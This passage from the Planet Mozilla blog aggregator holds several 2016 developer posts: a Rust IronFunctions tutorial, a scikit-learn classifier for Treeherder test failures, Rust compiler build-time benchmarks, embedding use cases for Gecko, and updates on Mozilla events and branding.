Make sure the project name is func and is of type bin. Now just edit your code, a good example is the following "Hello" example:

use std::io;  
use std::io::Read;

fn main() {  
    let mut buffer = String::new();
    let stdin = io::stdin();
    if stdin.lock().read_to_string(&mut buffer).is_ok() {
        println!("Hello {}", buffer.trim());
    }
}

You can find this example code in the repo.

Once done you can create an iron function.

Creating a function

$ fn init --runtime=rust <username>/<funcname>

in my case its fn init --runtime=rust seiflotfy/rustyfunc, which will create the func.yaml file required by functions.

Building the function

$ fn build

Will create a docker image <username>/<funcname> (again in my case seiflotfy/rustyfunc).

Testing

You can run this locally without pushing it to functions yet by running:

$ echo Jon Snow | fn run
Hello Jon Snow  

Publishing

In the directory of your rust code do the following:

$ fn publish -v -f -d ./

This will publish you code to your functions service.

Running it

Now to call it on the functions service:

$ echo Jon Snow | fn call seiflotfy rustyfunc 

which is the equivalent of:

$ curl -X POST -d 'Jon Snow' http://localhost:8080/r/seiflotfy/rustyfunc

Next

In the next post I will be writing a more computation intensive rust function to test/benchmark IronFunctions, so stay tune :D

Planet MozillaTraining an autoclassifier

Here at Mozilla, we’ve accepted that a certain amount of intermittent failure in our automated testing of Firefox is to be expected. That is, for every push, a subset of the tests that we run will fail for reasons that have nothing to do with the quality (or lack thereof) of the push itself.

On the main integration branches that developers commit code to, we have dedicated staff and volunteers called sheriffs who attempt to distinguish these expected failures from intermittents through a manual classification process using Treeherder. On any given push, you can usually find some failed jobs that have stars beside them, this is the work of the sheriffs, indicating that a job’s failure is “nothing to worry about”:

This generally works pretty well, though unfortunately it doesn’t help developers who need to test their changes on Try, which have the same sorts of failures but no sheriffs to watch them or interpret the results. For this reason (and a few others which I won’t go into detail on here), there’s been much interest in having Treeherder autoclassify known failures.

We have a partially implemented version that attempts to do this based on structured (failure line) information, but we’ve had some difficulty creating a reasonable user interface to train it. Sheriffs are used to being able to quickly tag many jobs with the same bug. Having to go through each job’s failure lines and manually annotate each of them is much more time consuming, at least with the approaches that have been tried so far.

It’s quite possible that this is a solvable problem, but I thought it might be an interesting exercise to see how far we could get training an autoclassifier with only the existing per-job classifications as training data. With some recent work I’ve done on refactoring Treeherder’s database, getting a complete set of per-job failure line information is only a small SQL query away:

1
2
3
4
5
select bjm.id, bjm.bug_id, tle.line from bug_job_map as bjm
  left join text_log_step as tls on tls.job_id = bjm.job_id
  left join text_log_error as tle on tle.step_id = tls.id
  where bjm.created > '2016-10-31' and bjm.created < '2016-11-24' and bjm.user_id is not NULL and bjm.bug_id is not NULL
  order by bjm.id, tle.step_id, tle.id;

Just to give some explanation of this query, the “bug_job_map” provides a list of bugs that have been applied to jobs. The “text_log_step” and “text_log_error” tables contain the actual errors that Treeherder has extracted from the textual logs (to explain the failure). From this raw list of mappings and errors, we can construct a data structure incorporating the job, the assigned bug and the textual errors inside it. For example:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
{
"bug_number": 1202623,
"lines": [
  "browser_private_clicktoplay.js Test timed out -",
  "browser_private_clicktoplay.js Found a tab after previous test timed out: http:/<number><number>:<number>/browser/browser/base/content/test/plugins/plugin_test.html -",
  "browser_private_clicktoplay.js Found a browser window after previous test timed out -",
  "browser_private_clicktoplay.js A promise chain failed to handle a rejection:  - at chrome://mochikit/content/browser-test.js:<number> - TypeError: this.SimpleTest.isExpectingUncaughtException is not a function",
  "browser_privatebrowsing_newtab_from_popup.js Test timed out -",
  "browser_privatebrowsing_newtab_from_popup.js Found a browser window after previous test timed out -",
  "browser_privatebrowsing_newtab_from_popup.js Found a browser window after previous test timed out -",
  "browser_privatebrowsing_newtab_from_popup.js Found a browser window
  after previous test timed out -"
  ]
}

Some quick google searching revealed that scikit-learn is a popular tool for experimenting with text classifications. They even had a tutorial on classifying newsgroup posts which seemed tantalizingly close to what we needed to do here. In that example, they wanted to predict which newsgroup a post belonged to based on its content. In our case, we want to predict which existing bug a job failure should belong to based on its error lines.

There are obviously some differences in our domain: test failures are much more regular and structured. There are lots of numbers in them which are mostly irrelevant to the classification (e.g. the “expected 12 pixels different, got 10!” type errors in reftests). Ordering of failures might matter. Still, some of the techniques used on corpora of normal text documents for training a classifier probably map nicely onto what we’re trying to do here: it seems plausible that weighting words which occur more frequently less strongly against ones that are less common would be helpful, for example, and that’s one thing their default transformers does.

In any case, I built up a small little script to download a subset of the downloaded data (from November 1st to November 23rd), used it as training data for a classifier, then tested that against another subset of test failures between November 24th and 28th.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import os
from sklearn.datasets import load_files
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.linear_model import SGDClassifier


training_set = load_files('training')
count_vect = CountVectorizer()
X_train_counts = count_vect.fit_transform(training_set.data)
tfidf_transformer = TfidfTransformer()
X_train_tfidf = tfidf_transformer.fit_transform(X_train_counts)
clf = SGDClassifier(loss='hinge', penalty='l2',
                    alpha=1e-3, n_iter=5, random_state=42).fit(X_train_tfidf, training_set.target)

num_correct = 0
num_missed = 0

for (subdir, _, fnames) in os.walk('testing/'):
    if fnames:
        bugnum = os.path.basename(subdir)
        print bugnum, fnames
        for fname in fnames:
            doc = open(os.path.join(subdir, fname)).read()
            if not len(doc):
                print "--> (skipping, empty)"
            X_new_counts = count_vect.transform([doc])
            X_new_tfidf = tfidf_transformer.transform(X_new_counts)
            predicted_bugnum = training_set.target_names[clf.predict(X_new_tfidf)[0]]
            if bugnum == predicted_bugnum:
                num_correct += 1
                print "--> correct"
            else:
                num_missed += 1
                print "--> missed (%s)" % predicted_bugnum
print "Correct: %s Missed: %s Ratio: %s" % (num_correct, num_missed, num_correct / float(num_correct + num_missed))

With absolutely no tweaking whatsoever, I got an accuracy rate of 75% on the test data. That is, the algorithm chose the correct classification given the failure text 1312 times out of 1959. Not bad for a first attempt!

After getting that working, I did some initial testing to see if I could get better results by reusing some of the error ETL summary code in Treeherder we use for bug suggestions, but the results were pretty much the same.

So what’s next? This seems like a wide open area to me, but some initial areas that seem worth exploring, if we wanted to take this idea further:

  1. Investigate cases where the autoclassification failed or had a near miss. Is there a pattern here? Is there something simple we could do, either by tweaking the input data or using a better vectorizer/tokenizer?
  2. Have a confidence threshold for using the autoclassifier’s data. It seems likely to me that many of the cases above where we got the wrong were cases where the classifier itself wasn’t that confident in the result (vs. others). We can either present that in the user interface or avoid classifications for these cases altogether (and leave it up to a human being to make a decision on whether this is an intermittent).
  3. Using the structured log data inside the database as input to a classifier. Structured log data here is much more regular and denser than the free text that we’re using. Even if it isn’t explicitly classified, we may well get better results by using it as our input data.

If you’d like to experiment with the data and/or code, I’ve put it up on a github repository.

Planet MozillaPlanet: A Minor Administrative Note

I will very shortly be adding some boilerplate to the Planet homepage as well as the Planet.m.o entry on Wikimo, to the effect that:

All of this was true before, but we’re going to highlight it on the homepage and make it explicit in the wiki; we want Planet to stay what it is, open, participatory, an equal and accessible platform for everyone involved, but we also don’t want Planet to become an attack surface, against Mozilla or anyone else, and won’t allow that to happen out of willful blindness or neglect.

If you’ve got any questions or concerns about this, feel free to leave a comment or email me.

Planet MozillaHow fast can I build Rust?

I've been collecting some data on the fastest way to build the Rust compiler. This is primarily for Rust developers to optimise their workflow, but it might also be of general interest.

TL;DR: the fastest ways to build Rust (on a computer with lots of cores) is with -j6, RUSTFLAGS=-Ccodegen-units=10.

I tested using a commit, from the 24th November 2016. I was using the make build system (though I would expect the same results using Rustbuild). The test machine is a dedicated build machine - it has 12 physical cores, lots of RAM, and an SSD. It wasn't used for anything else during the benchmarking, and doesn't run a windowing system. It was running Ubuntu 16.10 (Linux). I only did one run per set of variables. That is not ideal, but where I repeated runs, they were fairly consistent - usually within a second or two and never more than 10. I've rounded all results to the nearest 10 seconds, and I believe that level of precision is about right for the experiment.

I varied the number of jobs (-jn) and the number of codegen units (RUSTFLAGS=-Ccodegen-units=n). The command line looked something like RUSTFLAGS=-Ccodegen-units=10 make -j6. I measured the time to do a normal build of the whole compiler and libraries (make), to build the stage1 compiler (make rustc-stage, this is the minimal amount of work required to get a compiler for testing), and to build and bootstrap the compiler and run all tests (make && make check, I didn't run a simple make check because adding -jn to that causes many tests to be skipped; setting codegen-units > 1 causes some tests to fail).

The jobs number is the number of tasks make can run in parallel. These runs are self-contained instances of the compiler, i.e., this is parallelism outside the compiler. The amount of parallelism is limited by dependencies between crates in the compiler. Since the crates in the compiler are rather large and there are a lot of dependencies, the benefits of using a large number of jobs is much weaker than in a typical C or C++ program (e.g., LLVM). Note however that there is no real drawback to using a larger number of jobs, there just won't be any benefit.

Codegen units introduce parallelism within the compiler. First, some background. Compilation can be roughly split into two: first, code is analysed (parsing, type checking, etc.), then object code is generated from the products of analysis. The Rust compiler uses LLVM for the code generation part. Roughly half the time running an optimised build is spent in each of analysis and code generation. Nearly all optimisation is performed in the code generation part.

The compilation unit in Rust is a crate; that is, the Rust compiler analyses and compiles a single crate at a time. By default, code generation also works at the same level of granularity. However, by specifying the number of codegen units, we tell the compiler that once analysis is complete, it should break the crate into smaller units and run LLVM code generation on each unit in parallel. That means we get parallelism inside the compiler, albeit only for about half of the work. There is a disadvantage, however: using multiple codegen units means the program will not be optimised as well as if a single unit were used. This is analogous to turning off LTO in a C program. For this reason, you should not use multiple codegen units when building production software.

So when building the compiler, if we use many codegen units we might expect the compilation to go faster, but when we run the new compiler, it will be slower. Since we use the new compiler to build at least the libraries and sometimes another compiler, this could be an important factor in the total time.

If you're interested in this kind of thing, we keep track of compiler performance at perf.r-l.o (although only single-threaded builds). Nicholas Nethercote has recently written a couple of blog posts on running and optimising the compiler.

make

This experiment ran a simple make build. It builds two versions of the compiler - one using the last beta, and the second using the first.

 cg1cg2cg4cg6cg8cg10cg12
-j148m50s39m40s31m30s29m50s29m20s  
-j234m10s 27m40s 21m40s 20m30s 20m10s 19m30s 19m20s
-j428m10s 23m00s 17m50s 16m50s 16m40s 16m00s 16m00s
-j627m40s 22m40s 17m20s 16m20s 16m10s 15m40s 15m50s
-j827m40s 22m30s 17m20s 16m30s 16m30s 15m40s 15m40s
-j1027m40s      
-j1227m40s      
-j1427m50s      
-j1627m50s      

In general, we get better results using more jobs and more codegen units. Looking at the number of jobs, there is no improvement after 6. For codegen units, the improvements quickly diminish, but there is some improvement right up to using 10 (for all jobs > 2, 12 codegen units gave the same result as 10). It is possible that 9 or 11 codegen units may be more optimal (I only tested even numbers), but probably not by enough to be significant, given the precision of the experiment.

make rustc-stage1

This experiment ran make rustc-stage1. That builds a single compiler and the libraries necessary to use that compiler. It is the minimal amount of work necessary to test modifications to the compiler. It is significantly quicker than make.

 cg1cg2cg4cg6cg8cg10cg12
-j115m10s12m10s9m40s9m10s9m10s8m50s8m50s
-j211m00s8m50s6m50s6m20s6m20s6m00s6m00s
-j49m00s7m30s5m40s5m20s5m20s5m10s5m00s
-j69m00s7m10s5m30s5m10s5m00s5m00s5m00s

I only tested jobs up to 6, since there seems no way for more jobs to be profitable here, if not in the previous experiment. It turned out that 6 jobs was only marginally better than 4 in this case, I assume because of more dependency bottlenecks, relative to a full make.

I would expect more codegen units to be more effective here (since we're using the resulting compiler for less), but I was wrong. This may just be due to the precision of the test (and the relatively shorter total time), but for all numbers of jobs, 6 codegen units were as good as more. So, for this kind of build, six jobs and six codegen units is optimal; however, using ten codegen units (as for make) is not harmful.

make -jn && make check

This experiment is the way to build all the compilers and libraries and run all tests. I measured the two parts separately. As you might expect, the first part corresponded exactly with the results of the make experiment. The second part (make check) took a fairly consistent amount of time - it is independent of the number of jobs since the test infrastructure does its own parallelisation. I would expect compilation of tests to be slower with a compiler compiled with a larger number of codegen units. For one or two codegen units, make check took 12m40s, for four to ten, it took 12m50s, a marginal difference. That means that the optimal build used six jobs and ten codegen units (as for make), giving a total time of 28m30s (c.f., 61m40s for one job and one codegen unit).

Planet MozillaAnnouncing Panel of Judges for Mozilla’s Equal Rating Innovation Challenge

Mozilla is delighted to announce the esteemed judges for the Equal Rating Innovation Challenge

  • Rocio Fonseca (Chile), Executive Director of Start-Up Chile
  • Omobola Johnson (Nigeria), Honorary Chair of the Alliance for Affordable Internet and Partner of TLcom Capital LLP
  • Nikhil Pahwa (India), Founder at MediaNama and Co-founder of savetheinternet.in
  • Marlon Parker (South Africa), Founder of Reconstructed Living Labs

These four leaders will join Mitchell Baker (USA), Executive Chairwoman of Mozilla, on the judging panel for the Equal Rating Innovation Challenge. The judges will be bringing their wealth of industry experience and long-standing expertise from various positions in policy, entrepreneurship, and consulting in the private and public sector to assess the challenge submissions.

<figure></figure>

Mozilla seeks to find novel solutions to connect all people to the open Internet so they can realize the full potential of this globally shared resource. We’re both thrilled and proud to have gathered such a great roster of judges for the Innovation Challenge — it’s a testament to the global scope of the initiative. Each one of these leaders has already contributed in many ways to tackle the broader challenge of connecting the unconnected and it is an honour to have these global heavyweights in our panel.

The Equal Rating Innovation Challenge will support promising solutions through expert mentorship and funding of US$250,000 in prize monies split into three categories: Best Overall (with a key focus on scalability), Best Overall Runner-up, and Most Novel Solution (based on experimentation with a potential high reward).

The judges will score submissions according to the degree by which they meet the following attributes:

  • 25pts: Scalability
  • 20pts: Focus on user experience
  • 15pts: Differentiation
  • 10pts: Ability to be quickly deployed into the market (within 9–12 months)
  • 10pts: Potential of the team
  • 10pts: Community voting results

The deadline for submission is 6 January 2017. On 17 January, the judges will announce five semifinalists. Those semifinalists will be provided advice and mentorship from Mozilla experts in topics such as policy, business, engineering, and design to hone their solution. The semifinalists will take part in a Demo Day on 9 March 2017 in New York City to pitch their solutions to the judges. The public will then be invited to vote for their favorite solution online during a community voting period from 10–16 March, and the challenge winners will be announced on 29 March 2017.


Announcing Panel of Judges for Mozilla’s Equal Rating Innovation Challenge was originally published in Mozilla Open Innovation on Medium, where people are continuing the conversation by highlighting and responding to this story.

Planet MozillaFirefox 51 Beta 3 Testday Results

Hi everyone!

Last Friday, November 25th, we held Firefox 51 Beta 3 Testday.  It was a successful event (please see the results section below) so a big Thank You goes to everyone involved.

First of all, many thanks to our active contributors: Krithika MAPMoin Shaikh, M A Prasanna, Steven Le Flohic, P Avinash Sharma, Iryna Thompson.

Bangladesh team: Nazir Ahmed Sabbir, Sajedul Islam, Maruf Rahman, Majedul islam Rifat, Ahmed Safa,  Md Rakibul Islam, M. Almas Hossain, Foysal Ahmed, Nadim Mahmud, Amir Hossain Rhidoy, Mohammad Abidur Rahman Chowdhury, Mahfujur Rahman Mehedi, Md Omar Faruk sobuj, Sajal Ahmed, Rezwana Islam Ria, Talha Zubaer, maruf hasan, Farhadur Raja Fahim, Saima sharleen, Azmina AKterPapeya, Syed Nayeem Roman.

India team:  Vibhanshu Chaudhary, Surentharan.R.A, Subhrajyoti Sen, Govindarajan Sivaraj, Kavya Kumaravel, Bhuvana Meenakshi.K, Paarttipaabhalaji, P Avinash Sharma, Nagaraj V, Pavithra R, Roshan Dawande, Baranitharan, SriSailesh, Kesavan S, Rajesh. D, Sankararaman, Dinesh Kumar M, Krithikasowbarnika.

Secondly, a big thank you to all our active moderators.

Results:

We hope to see you all in our next events, all the details will be posted on QMO!

Planet MozillaMeasuring tab and window usage in Firefox

With Mozilla’s Telemetry system, we have a powerful way to collect measurements in the clients while still complying to our rules of lean data collection and anonymization. Most of the measurements are collected in form of histograms that are created on the client side and submitted to our Telemetry pipeline. However, recent needs for better … 

Planet MozillaEmbedding Use Cases

A couple weeks ago, I blogged about Why Embedding Matters. A rendering engine can be put to a wide variety of uses. Here are a few of them. Which would you prioritize?

Headless Browser

A headless browser is an app that renders a web page (and executes its script) without displaying the page to a user. Headless browsers themselves have multiple uses, including automated testing of websites, web crawling/scraping, and rendering engine comparisons.

Longstanding Mozilla bug 446591 tracks the implementation of headless rendering in Gecko, and SlimerJS is a prime example of a headless browser would benefit from it. It’s a “scriptable browser for Web developers” that integrates with CasperJS and is compatible with the WebKit-based PhantomJS headless browser. It currently uses Firefox to “embed” Gecko, which means it doesn’t run headlessly (SlimerJS issue #80 requests embedding Gecko as a headless browser).

Hybrid Desktop App

A Hybrid Desktop App is a desktop app that is implemented primarily with web technologies but packaged, distributed, and installed as a native app. It enables developers to leverage web development skills to write an app that runs on multiple desktop platforms (typically Windows, Mac, Linux) with minimal platform-specific development.

Generally, such apps are implemented using an application framework, and Electron is the one with momentum and mindshare; but there are others available. While frameworks can support deep integration with the native platform, the apps themselves are often shallower, limiting themselves to a small subset of platform APIs (window management, menus, etc.). Some are little more than a local web app loaded in a native window.

Hybrid Desktop Web Browser

A specialization of the Hybrid Desktop App, the Hybrid Desktop Web Browser is notable not only because Mozilla’s core product offering is a web browser but also because the category is seeing a wave of innovation, both within and outside of Mozilla.

Besides Mozilla’s Tofino and Browser.html projects, there are open source startups like Brave; open-source hobbyist projects like Min, Alloy, electron-browser, miserve, and elector; and proprietary browsers like Blisk and Vivaldi. Those products aren’t all Hybrid Apps, but many of them are (and they all need to embed a rendering engine, one way or another).

Hybrid Mobile App

A Hybrid Mobile App is like a Hybrid Desktop App, but for mobile platforms (primarily iOS and Android). As with their desktop counterparts, they’re usually implemented using an application framework (like Cordova). And some use the system’s web rendering component (WebView), while others ship their own via frameworks (like Crosswalk).

Basecamp notably implemented a hybrid mobile app, which they described in Hybrid sweet spot: Native navigation, web content.

(There’s also a category of apps that are implemented with some web technologies but “compile to native,” such that they render their interface using native components rather than a WebView. React Native is the most notable such framework, and James Long has some observations about it in Radical Statements about the Mobile Web and First Impressions using React Native.)

Mobile App With WebView

A Mobile App With WebView is a native app that incorporates web content using a WebView. In some cases, a significant portion of the app’s interface displays web content. But these apps are distinct from Hybrid Mobile Apps not only in degree but in kind, as the choice to develop a native app with web content (as opposed to packaging a web app in a native format using a hybrid app framework) entrains different skillsets and toolchains.

Facebook (which famously abandoned hybrid app development in 2012) is an example of such an app.

Site-Specific Browser (SSB)

A Site-Specific Browser (SSB) is a native desktop app (or simulation thereof) that loads a single web app in a discrete native window. SSBs typically install launcher icons in OS app launchers, remove or minimize browser chrome in app windows, and may include native menus and other features typical of desktop apps.

Chrome’s –app mode allows it to simulate an SSB, and recent Mozilla bug 1283670 requests a similar feature for Firefox.

SSBs differ from hybrid desktop apps because they wrap regular web apps (i.e. apps that are hosted on a web server and also available via a standard web browser). They’re also typically created by users using utilities, browser features, or browser extensions rather than by developers. Examples of such tools include Prism, Standalone, and Fluid. However, hybrid app frameworks like Electron can also be used (by both users and developers) to create SSBs.

Linux Embedded Device

A variety of embedded devices include a graphical user interface (GUI), including human-machine interface (HMI) devices and Point of Interest (POI) kiosks. Embedded devices with such interfaces often implement them using web technologies, for which they need to integrate a rendering engine.

The embedded device space is complex, with multiple solutions at every layer of the technology stack, from hardware chipset through OS (and OS distribution) to application framework. But Linux is a popular choice at the operating system layer, and projects like OpenEmbedded/Yocto Project and Buildroot specialize in embedded Linux distributions.

Embedded devices with GUIs also come in all shapes and sizes. However, it’s possible to identify a few broad categories. The ones for which an embedded rendering engine seems most useful include industrial and home automation (which use HMI screens to control machines), POI/POS kiosks, and smart TVs. There may also be some IoT devices with GUIs.

Planet Mozillalibopenraw 0.1.0

I just released libopenraw 0.1.0. It is to be treated as a snapshot as it hasn't reached the level of functionality I was hoping for and it has been 5 years since last release.

Head on to the download page to get a tarball.

Several new API, some API + ABI breakage. Now the .pc files are parallel installable.

Planet MozillaHeading into the home stretch

Over the past few weeks, we’ve been exploring different iterations of our brand identity system. We know we need a solution that represents both who Mozilla is today and where we’re going in the future, and appeals both to people who know Mozilla well and new audiences who may not know or understand Mozilla yet. If you’re new to this project, you can read all about our journey on our blog, and the most recent post about the two different design directions that are informing this current round of work.

[TL;DR: Our “Protocol” design direction delivers well on our mission, legacy and vision to build an Internet as a global public resource that is healthy, open and accessible to all. Based on quantitative surveys, Mozillians and developers believe this direction does the best job supporting an experience that’s innovative, opinionated and inclusive, the attributes we want to be known for.  In similar surveys, our target consumers evaluated our “Burst” design direction as the better option in terms of delivering on those attributes, and we also received feedback that this direction did a good job communicating interconnectedness and liveliness. Based on all of this feedback, our decision was to lead with the “Protocol” design direction, and explore ways to infuse it with some of the strengths of the “Burst” direction.]

Here’s an update on what we’ve been up to:

Getting to the heart of the matter

Earlier in our open design project, we conducted quantitative research to get statistically significant insights from our different key audiences (Mozillians, developers, consumers), and used these data points to inform our strategic decision about which design directions to continue to refine.

At this point of our open design project, we used qualitative research to understand better what parts of the refined identity system were doing a good job creating that overall experience, and what was either confusing or contradictory. We want Mozilla to be known and experienced as a non-profit organization that is innovative, opinionated and inclusive, and our logo and other elements in our brand identity system – like color, language and imagery – need to reinforce those attributes.

So we recruited participants in the US, Brazil, Germany and India between the ages of 18  – 40 years, who represent our consumer target audience: people who make decisions about the companies they support based on their personal values and ideals, which are driven by bettering their communities and themselves. 157 people participated (average about 39 from each country), with a split between 49% men and 51% women. 69% were between 18 – 34 years, and 90% had some existing awareness of Mozilla.

For 2 days, they interacted with an online moderator and had the opportunity to see and respond to others’ opinions in real time.

Learnings from this qualitative research are not intended to provide statistical analysis on which identity system was “the winner.”  Instead respondents talk about what they’re seeing, while the moderator uncovers trends within these comments, and dives deeper into areas that are either highly favorable or unfavorable by asking “why?”  This type of research is particularly valuable at our stage of an identity design process – where we’ve identified the strategic idea, and are figuring out the best way to bring it to life. Consumers not intimately familiar with Mozilla view the brand identity system with fresh eyes, helping illuminate any blind spots and provide insights into what helps new audiences better understand us.

Tapping into internal experts

Another extremely important set of stakeholders who have provided insights throughout the entire project, and especially at this stage, is our brand advisory group, composed of technologists, designers, strategists and community representatives from throughout Mozilla. This team was responsible not only for representing their “functional” area, but also accountable for representing the community of Mozillians across the world. We met every two weeks, sharing work-in-progress and openly and honestly discussing the merits and misses of each design iteration.

In addition to regular working sessions, we also asked our brand advisory group members to represent the work with their own networks, field questions, and surface concerns.  At one point, one of our technology representatives called out that several developers and engineers did not understand the strategic intent and approach to project, and needed a better framework by which to evaluate the work in progress.  So we convened this group for a frank and freewheeling conversation, and everyone —the design team included — walked away with a much deeper appreciation for the opportunities and challenges.

That exchange inspired us to host a series of “brown bag” conversations, open to all staff and volunteer Mozillians.  During one week in October, we hosted five 60-minute sessions, as early as 7am PT and as late as 8pm PT to accommodate global time zones and participants. We also videotaped one session and made that available on AirMozilla, our video network, for those unable to attend in person. Throughout those 5 days, over 150 people participated in those critique sessions, which proved to be rich with constructive ideas.

The important thing to note is that these “brown bag” sessions were not driving toward consensus, but instead invited critical examination and discussion of the work based on a very explicit set of criteria. Similar to the qualitative research conducted with our target consumer audience, these discussions allowed us to ask “why” and “why not” and truly understand emotional reactions in a way that quantitative surveys aren’t able to do.

The participation and contribution of our brand advisory group has been invaluable. They’ve been tough critics, wise counsel, patient sounding boards, trusted eyes and ears and ultimately, strategic partners in guiding the brand identity work. They’re helping us deliver a solution that has global appeal, is technically beautiful, breaks through the clutter and noise, scales across all of our products, technologies, programs, and communities, and is fit for the future.  Most importantly, they have been an important barometer in designing a system that is both true to who we are and pushes us to where we want to go.

Closing in on a recommendation

The feedback from the qualitative consumer research indicates that the new brand identity reinforces the majority of the key attributes we want Mozilla to represent. Along with insights from our brand advisory group and leadership, this feedback helps direct our work as we move to a final recommendation and find the right balance between bold and welcoming. Our goal is to share an update at our All Hands meeting in early December, almost exactly six months from the date we first shared options for strategic narratives to kick off the work. Following that, we’ll post it here as well.

Footnotes

Updated: .  Michael(tm) Smith <mike@w3.org>